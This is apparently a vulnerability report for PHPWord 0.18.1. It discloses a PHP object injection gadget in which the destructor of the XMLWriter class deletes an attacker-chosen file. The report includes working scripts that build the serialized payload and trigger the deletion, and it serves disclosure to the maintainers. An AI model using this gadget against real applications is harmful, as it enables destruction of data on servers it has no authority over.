There is a simple POP chain that can cause arbitrary file delete, this POP chain can be leveraged in the exploitation of POI vulnerability

[nth347]

Describe the Bug

The XMLWriter class has a __destruct() method, the unlink() function is called in there with an object's property as a parameter (See the picture below). Because all the properties of an object can be controlled by an attacker via POI vulnerability, this simple POP chain consists of only one method call, but it can cause arbitrary file delete!

Steps to Reproduce

Script for generating serialized payload, generate.php:

<?php
namespace PhpOffice\PhpWord\Shared;
class XMLWriter {
    private $tempFileName = '';

    public function __construct($fileName) {
        $this->tempFileName = $fileName;
    }
}

$xmlWriter = new XMLWriter("/home/nth347/test.txt");
file_put_contents("payload.txt", serialize($xmlWriter));

$ php generate.php

Script for testing the generated payload, test.php:

<?php
require_once "vendor/autoload.php";

unserialize(file_get_contents("payload.txt"));

php test.php

Expected Evil Behavior

The /home/nth347/test.txt file will be deleted after executing the test.php script.

Context

• PHP 7.4.3:
• PHPWord 0.18.1: